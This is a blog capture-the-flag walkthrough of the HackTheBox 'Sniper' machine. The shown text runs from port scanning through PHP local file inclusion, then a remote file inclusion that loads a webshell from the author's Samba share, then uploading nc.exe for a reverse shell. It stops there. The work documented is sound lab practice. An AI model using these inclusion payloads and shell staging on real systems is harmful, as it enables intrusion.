<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="Quick Summary   → Sniper is another windows machine that you can access in unintended method.   The PHP Web Application was supposed to be vulnerable into LFI or Local File Inclusion to RFI or Remote">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Sniper 🏷️🔫">
<meta property="og:url" content="https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/index.html">
<meta property="og:site_name" content="PΛYΛƧ0">
<meta property="og:description" content="Quick Summary   → Sniper is another windows machine that you can access in unintended method.   The PHP Web Application was supposed to be vulnerable into LFI or Local File Inclusion to RFI or Remote">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-info2.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-login-page.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-underconst.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-web.gif">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-blog.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-error">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-lfi.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-page-source.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-webshell.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-mkdir.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-uploadexd.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-nc.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-dbphp.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/sniper-netstat.png">
<meta property="og:image" content="https://ph-payas0.github.io/img/sniper/instructions1.png">
<meta property="og:image" content="https://www.hackthebox.eu/badge/image/128965">
<meta property="article:published_time" content="2020-03-29T03:16:47.000Z">
<meta property="article:modified_time" content="2020-06-09T21:47:34.337Z">
<meta property="article:author" content="medz">
<meta property="article:tag" content="retired">
<meta property="article:tag" content="php">
<meta property="article:tag" content="lfi">
<meta property="article:tag" content="rfi">
<meta property="article:tag" content="chm">
<meta property="article:tag" content="unintended">
<meta property="article:tag" content="windows">
<meta property="article:tag" content="powershell">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://ph-payas0.github.io/img/sniper/sniper-info2.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon-1.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/android-chrome-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>HackTheBox - Sniper 🏷️🔫</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="PΛYΛƧ0" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020-04-05/HackTheBox-Registry/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020-03-13/HackTheBox-Postman/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&text=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&is_video=false&description=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Sniper 🏷️🔫&body=Check out this article: https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&title=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&name=HackTheBox - Sniper 🏷️🔫&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://ph-payas0.github.io/2020-03-29/HackTheBox-Sniper/&t=HackTheBox - Sniper 🏷️🔫" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Quick-Summary"><span class="toc-number">1.</span> <span class="toc-text">Quick Summary</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Penetration-Testing-Methodologies"><span class="toc-number">2.</span> <span class="toc-text">Penetration Testing Methodologies</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Network-Scanning"><span class="toc-number">3.</span> <span class="toc-text">Network Scanning</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Walkthrough"><span class="toc-number">3.1.</span> <span class="toc-text">Walkthrough</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Nmap-results"><span class="toc-number">3.2.</span> <span class="toc-text">Nmap results</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">4.</span> <span class="toc-text">Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Scan-Web-page-directories"><span class="toc-number">4.1.</span> <span class="toc-text">Scan Web page directories</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Sniper-Web-Page"><span class="toc-number">4.2.</span> <span class="toc-text">Sniper Web Page</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation"><span class="toc-number">5.</span> <span class="toc-text">Post - Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#LFI-Local-File-Inclusion"><span class="toc-number">5.1.</span> <span class="toc-text">LFI | Local File Inclusion</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RFI-Remote-File-Inclusion"><span class="toc-number">5.2.</span> <span class="toc-text">RFI | Remote File Inclusion</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Enumerating-SNIPER-machine"><span class="toc-number">5.3.</span> <span class="toc-text">Enumerating SNIPER machine</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploitation"><span class="toc-number">6.</span> <span class="toc-text">Exploitation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Privilege-Escalation-for-user-CHRIS"><span class="toc-number">6.1.</span> <span class="toc-text">Privilege Escalation for user CHRIS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Method-1"><span class="toc-number">6.2.</span> <span class="toc-text">Method #1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Method-2"><span class="toc-number">6.3.</span> <span class="toc-text">Method #2</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">7.</span> <span class="toc-text">Privilege Escalation</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Note-txt"><span class="toc-number">7.1.</span> <span class="toc-text">Note.txt</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CHM-File"><span class="toc-number">7.2.</span> <span class="toc-text">CHM File</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Generate-Malicious-CHM-File"><span class="toc-number">7.3.</span> <span class="toc-text">Generate Malicious CHM File</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Gain-the-Administrator-Shell"><span class="toc-number">8.</span> <span class="toc-text">Gain the Administrator Shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root"><span class="toc-number">9.</span> <span class="toc-text">Root</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Get-the-root-txt"><span class="toc-number">9.1.</span> <span class="toc-text">Get the root.txt</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
        <div class="content index py4">
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        <div class="firefly"></div>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackTheBox - Sniper 🏷️🔫
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">PΛYΛƧ0</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-03-29T03:16:47.000Z" itemprop="datePublished">29-03-2020</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/HackTheBox/">HackTheBox</a> › <a class="category-link" href="/categories/HackTheBox/PenTesting/">PenTesting</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/chm/" rel="tag">chm</a>, <a class="tag-link" href="/tags/lfi/" rel="tag">lfi</a>, <a class="tag-link" href="/tags/php/" rel="tag">php</a>, <a class="tag-link" href="/tags/powershell/" rel="tag">powershell</a>, <a class="tag-link" href="/tags/retired/" rel="tag">retired</a>, <a class="tag-link" href="/tags/rfi/" rel="tag">rfi</a>, <a class="tag-link" href="/tags/unintended/" rel="tag">unintended</a>, <a class="tag-link" href="/tags/windows/" rel="tag">windows</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p><img src="/img/sniper/sniper-info2.png" alt="HackTheBox-Sniper/sniper-info.png" title="Sniper machine details"></p>
<h2 id="Quick-Summary"><a href="#Quick-Summary" class="headerlink" title="Quick Summary"></a>Quick Summary</h2><p>   → Sniper is another windows machine that you can access in unintended method.<br>   The <code>PHP</code> Web Application was supposed to be vulnerable into <a href="https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/" target="_blank" rel="noopener">LFI or Local File Inclusion</a> to <a href="https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/" target="_blank" rel="noopener">RFI or Remote File Inclusion</a>.<br>   Since this is a windows box I setup a samba share using the <code>RFI</code> method and I injecting my webshell and upload my <code>executable file</code> to get a reverse shell from my Kali Linux machine.<br>   Doing some <code>Reconnaisance</code> I see a file which has to be related to <code>user</code> credentials that need to convert into a plain text then execute it with the <code>executable file</code> i uploaded.<br>   The machine creator was leave a <code>notes.txt</code> on use file directory which is good enough as <code>hint</code>. Creating a malicious payload from my host using <code>Powershell</code> was not easy as my Windows always reject it and cannot load the script file but then I managed to create a malicious <code>CHM</code> file and get the Administrator.</p>
<hr>
<h2 id="Penetration-Testing-Methodologies"><a href="#Penetration-Testing-Methodologies" class="headerlink" title="Penetration Testing Methodologies"></a>Penetration Testing Methodologies</h2><ol>
<li><p><strong>Network Scanning</strong></p>
<p>→ Nmap scan</p>
<p>→ discover open ports and what services are running</p>
</li>
<li><p><strong>Enumeration</strong></p>
<p>→ Browsing the HTTP Service</p>
<p>→ Enumerate the SMB at port 445</p>
<p>→ Bruteforce the Web page directories</p>
</li>
<li><p><strong>Post - Exploitation</strong></p>
<p>→ Enumerate the page with <code>Local File Inclusion</code></p>
<p>→ Setup <code>SAMBA SHARE</code> and upload a webshell</p>
<p>→ Using the <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk" target="_blank" rel="noopener">access checked</a> provided by the <code>Microsoft</code> to check the access rights of account <code>&quot;Chris&quot;</code></p>
<p>→ Retrieve <code>user credentials</code> from Web page directories in <code>inetpub</code></p>
</li>
<li><p><strong>Exploitation</strong></p>
<p>→ <strong><em>Method #1:</em></strong><br>Look at listening port that can use to <code>Port Forwarding</code> and Login as <code>Chris</code> using <a href="https://github.com/Hackplayers/evil-winrm" target="_blank" rel="noopener">Evil-WinRM</a></p>
<p>→ <strong><em>Method #2:</em></strong><br>Convert the password hash into plaintext with <code>Powershell</code> and execute the <code>nc.exe</code> to get Reverse shell</p>
<p>→ Finally got the <code>user.txt</code></p>
</li>
<li><p><strong>Privilege Escalation</strong></p>
<p>→ Enumerate file directories</p>
<p>→ Looking at <code>notes.txt</code> that give us hint.</p>
<p>→ Create a malicious file in <code>Powershell</code> with <a href="https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1" target="_blank" rel="noopener">Out-CHM.ps1</a> from <a href="https://github.com/samratashok/nishang" target="_blank" rel="noopener">Nishang</a></p>
<p>→ Transfer to the Sniper machine in <code>C:\Docs</code> directories where the Administrator checked and open it.</p>
<p>→ Setup <code>netcat</code> listener and</p>
<p>→ Gain the Administrator shell</p>
</li>
</ol>
<hr>
<h2 id="Network-Scanning"><a href="#Network-Scanning" class="headerlink" title="Network Scanning"></a>Network Scanning</h2><h3 id="Walkthrough"><a href="#Walkthrough" class="headerlink" title="Walkthrough"></a>Walkthrough</h3><p>→ First, I run the <strong><em>NMAP</em></strong> to scan the target and get information about the various services that are running on the target machine. I use</p>
<hr>
<ul>
<li>-sV      ⇒ Probe open ports to determine service/version info</li>
<li>-sC      ⇒ equivalent to —script=default</li>
<li>-T 0-5   ⇒ Set timing template - higher is faster (less accurate)</li>
<li>-p-      ⇒ Scan all 65535 ports</li>
<li>-oN      ⇒ to save our scan results to a text file</li>
</ul>
<hr>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># sh</span></span><br><span class="line">nmap -sV -sC -T4 -p- 10.10.10.151 -oN nmap-Sniper</span><br></pre></td></tr></table></figure>

<hr>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># sh</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sniper </span><br><span class="line">❯ nmap -sV -sC -T4 -p- 10.10.10.151 -oN nmap-Sniper</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-26 23:52 PST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.10.151</span><br><span class="line">Host is up (0.22s latency).</span><br><span class="line">Not shown: 65530 filtered ports</span><br><span class="line">PORT      STATE SERVICE       VERSION</span><br><span class="line">80/tcp    open  http          Microsoft IIS httpd 10.0</span><br><span class="line">| http-methods: </span><br><span class="line">|_  Potentially risky methods: TRACE</span><br><span class="line">|_http-server-header: Microsoft-IIS/10.0</span><br><span class="line">|_http-title: Sniper Co.</span><br><span class="line">135/tcp   open  msrpc         Microsoft Windows RPC</span><br><span class="line">139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn</span><br><span class="line">445/tcp   open  microsoft-ds?</span><br><span class="line">49667/tcp open  msrpc         Microsoft Windows RPC</span><br><span class="line">Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:                                                                     </span><br><span class="line">|_clock-skew: 7h02m31s                                                                   </span><br><span class="line">| smb2-security-mode: </span><br><span class="line">|   2.02: </span><br><span class="line">|_    Message signing enabled but not required</span><br><span class="line">| smb2-time: </span><br><span class="line">|   date: 2020-03-26T23:03:52</span><br><span class="line">|_  start_date: N/A</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 562.35 seconds</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sniper took 9m22s </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Nmap-results"><a href="#Nmap-results" class="headerlink" title="Nmap results"></a>Nmap results</h3><p>So there’s port open.</p>
<ul>
<li>80      ⇒ which basically hosted a Web page</li>
<li>135       ⇒ running as Windows RPC</li>
<li>139       ⇒ running on Windows Microsoft netbios-ssn</li>
<li>445       ⇒ which is a default port on SMB</li>
<li>49667     ⇒ running as Windows RPC too</li>
</ul>
<hr>
<hr>
<h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h2><p>The first thing I did is connect to machine with <code>smbclient</code> at port 445 and try anonymous login but it seems’ I am not allowed to do that.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sniper </span><br><span class="line">❯ smbclient -L 10.10.10.151 -U <span class="string">""</span></span><br><span class="line">Enter WORKGROUP\<span class="string">'s password: </span></span><br><span class="line"><span class="string">session setup failed: NT_STATUS_LOGON_FAILURE</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">root in htb/boxes/Sniper took 3s </span></span><br><span class="line"><span class="string">❯</span></span><br></pre></td></tr></table></figure>

<p>Next, I use <code>enum4linux</code> – A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts but not working too.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># sh</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sniper </span><br><span class="line">❯ enum4linux -o -U -G -S -P 10.10.10.151</span><br><span class="line">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 28 03:56:55 2020</span><br><span class="line"></span><br><span class="line"> ========================== </span><br><span class="line">|    Target Information    |</span><br><span class="line"> ========================== </span><br><span class="line">Target ........... 10.10.10.151</span><br><span class="line">RID Range ........ 500-550,1000-1050</span><br><span class="line">Username ......... <span class="string">''</span></span><br><span class="line">Password ......... <span class="string">''</span></span><br><span class="line">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> ==================================================== </span><br><span class="line">|    Enumerating Workgroup/Domain on 10.10.10.151    |</span><br><span class="line"> ==================================================== </span><br><span class="line">[E] Can<span class="string">'t find workgroup/domain</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> ===================================== </span></span><br><span class="line"><span class="string">|    Session Check on 10.10.10.151    |</span></span><br><span class="line"><span class="string"> ===================================== </span></span><br><span class="line"><span class="string">Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.</span></span><br><span class="line"><span class="string">[E] Server doesn'</span>t allow session using username <span class="string">''</span>, password <span class="string">''</span>.  Aborting remainder of tests.</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sniper took 11s </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<h3 id="Scan-Web-page-directories"><a href="#Scan-Web-page-directories" class="headerlink" title="Scan Web page directories"></a>Scan Web page directories</h3><p>So I will leave enumerating this machine for a while and try to enumerate what’s on the Web page. I use <a href="https://github.com/maurosoria/dirsearch" target="_blank" rel="noopener">dirsearch</a> <code>Web path scanner</code> if i can get any usefull stuffs so</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># python</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> ~/htb/vpn </span><br><span class="line">❯ python3 /opt/dirsearch/dirsearch.py -u <span class="string">"http://10.10.10.151/"</span>  -e php,txt -x <span class="number">301</span>,<span class="number">302</span>,<span class="number">403</span>,<span class="number">404</span> --simple-report=sniper-directories</span><br><span class="line"></span><br><span class="line"> _|. _ _  _  _  _ _|_    v0<span class="number">.3</span><span class="number">.9</span></span><br><span class="line">(_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, txt | HTTP method: get | Threads: <span class="number">10</span> | Wordlist size: <span class="number">6417</span></span><br><span class="line"></span><br><span class="line">Error Log: /opt/dirsearch/logs/errors<span class="number">-20</span><span class="number">-03</span><span class="number">-28</span>_02<span class="number">-20</span><span class="number">-51.l</span>og</span><br><span class="line"></span><br><span class="line">Target: http://<span class="number">10.10</span><span class="number">.10</span><span class="number">.151</span>/</span><br><span class="line"></span><br><span class="line">[<span class="number">02</span>:<span class="number">20</span>:<span class="number">51</span>] Starting: </span><br><span class="line">[<span class="number">02</span>:<span class="number">22</span>:<span class="number">59</span>] <span class="number">200</span> -    <span class="number">3</span>KB - /index.php                                                                              </span><br><span class="line">[<span class="number">02</span>:<span class="number">22</span>:<span class="number">59</span>] <span class="number">200</span> -    <span class="number">3</span>KB - /INDEX.PHP   </span><br><span class="line">[<span class="number">02</span>:<span class="number">22</span>:<span class="number">59</span>] <span class="number">200</span> -    <span class="number">3</span>KB - /index.PHP</span><br><span class="line">[<span class="number">02</span>:<span class="number">22</span>:<span class="number">59</span>] <span class="number">200</span> -    <span class="number">3</span>KB - /index.php/login/</span><br><span class="line">[<span class="number">02</span>:<span class="number">24</span>:<span class="number">19</span>] <span class="number">200</span> -    <span class="number">5</span>KB - /user/login.php                                                                         </span><br><span class="line">                                                                                        </span><br><span class="line">Task Completed</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> ~/htb/vpn took <span class="number">3</span>m38s </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<h3 id="Sniper-Web-Page"><a href="#Sniper-Web-Page" class="headerlink" title="Sniper Web Page"></a>Sniper Web Page</h3><p>so there is <code>login page</code> which caught my attention at <code>/user/login.php</code></p>
<p><img src="/img/sniper/sniper-login-page.png" alt="HackTheBox-Sniper/sniper-login-page.png" title="Sniper login page"></p>
<p>I tried to input <code>admin:admin</code> for username and password and it redirects me into <code>Under Construction Page</code>.</p>
<p><img src="/img/sniper/sniper-underconst.png" alt="HackTheBox-Sniper/sniper-underconst.png" title="Sniper under construct"></p>
<p>I realized that this page is just a rabbit hole, can’t find any hints in the page source, so I try enumerate the whole page of sniper in <code>http://10.10.10.151</code></p>
<p><img src="/img/sniper/sniper-web.gif" alt="HackTheBox-Sniper/sniper-web.gif" title="Sniper whole page"></p>
<hr>
<h2 id="Post-Exploitation"><a href="#Post-Exploitation" class="headerlink" title="Post - Exploitation"></a>Post - Exploitation</h2><h3 id="LFI-Local-File-Inclusion"><a href="#LFI-Local-File-Inclusion" class="headerlink" title="LFI | Local File Inclusion"></a>LFI | Local File Inclusion</h3><p>After several enumeration in the web page’ I found interesting section at <code>Services</code> there’s a link there that you can use to change the language but what more interesting, it’s not like the other website that you can right click -&gt; and change/translate the language. there’s a <code>PHP File</code> is assign to pick language for you.</p>
<p><img src="/img/sniper/sniper-blog.png" alt="HackTheBox-Sniper/sniper-blog.png" title="Sniper blog"></p>
<p>when I try to inject a single <code>&#39;</code> in <code>lang=blog-en.php</code> it turn something like this’ seems to be it is vulnerable to <code>LFI or Local File Inclusion attack</code></p>
<p><img src="/img/sniper/sniper-error'.png" alt="HackTheBox-Sniper/sniper-error&#39;.png" title="Sniper blog"></p>
<p>To confirm that this website is vulnerable to <code>LFI</code> I put this parameter at <code>&quot;lang=&quot;</code> ⇒ <code>\windows\system32\drivers\etc\hosts</code></p>
<p><img src="/img/sniper/sniper-lfi.png" alt="HackTheBox-Sniper/sniper-lfi.png" title="Sniper LFI"></p>
<p>looking at at <code>view page source</code> we will see about the hosts file.</p>
<p><img src="/img/sniper/sniper-page-source.png" alt="HackTheBox-Sniper/sniper-page-source.png" title="Sniper LFI"></p>
<hr>
<h3 id="RFI-Remote-File-Inclusion"><a href="#RFI-Remote-File-Inclusion" class="headerlink" title="RFI | Remote File Inclusion"></a>RFI | Remote File Inclusion</h3><p>So I search on Google about <a href="http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html/" target="_blank" rel="noopener">LFI to RFI article</a> and that one is pretty good. It help me to inject a webshell and get in to the machine.</p>
<p>I setup my <code>SAMBA SHARE</code> based on the article with this configuration at <code>/etc/samba/smb.conf</code></p>
<figure class="highlight sh"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">[global]</span><br><span class="line">workgroup = WORKGROUP</span><br><span class="line">server string - Samba Server %v</span><br><span class="line">netbios name = Payas0</span><br><span class="line">security = user</span><br><span class="line">map to guest = bad user</span><br><span class="line">name to resolve order = bcast host</span><br><span class="line">dns proxy = no</span><br><span class="line"><span class="built_in">bind</span> interfaces only = yes</span><br><span class="line"></span><br><span class="line">[medz]</span><br><span class="line">path = /root/htb/boxes/Sniper/</span><br><span class="line">writable = no</span><br><span class="line">guest ok = yes</span><br><span class="line">guest only = yes</span><br><span class="line"><span class="built_in">read</span> only = yes</span><br><span class="line">directory mode = 0555</span><br><span class="line">force user = nobody</span><br></pre></td></tr></table></figure>

<p>Now everything looks fine i restart my samba share and do the RFI method.<br>To take control the web I use <a href="https://github.com/WhiteWinterWolf/wwwolf-php-webshell" target="_blank" rel="noopener">Winter WebShell</a> so I can upload my payload and execute a revershell, so i will now put my IP address at <code>lang=\\10.10.14.216\medz\shell.php</code> then make a custom directory at <code>C:</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">service smbd restart</span><br></pre></td></tr></table></figure>

<p><img src="/img/sniper/sniper-webshell.png" alt="HackTheBox-Sniper/sniper-webshell.png" title="Sniper RFI"></p>
<p>Create folder named – payas0</p>
<p><img src="/img/sniper/sniper-mkdir.png" alt="HackTheBox-Sniper/sniper-mkdir.png" title="Sniper RFI"></p>
<p>Looks good ! then i will upload <code>nc.exe</code> at <code>C:\payas0</code></p>
<p><img src="/img/sniper/sniper-uploadexd.png" alt="HackTheBox-Sniper/sniper-uploadexd.png" title="Sniper RFI"></p>
<p>Now everything is set i will execute <code>nc.exe</code> with my IP and Port at 9001 and popup <code>Powershell</code></p>
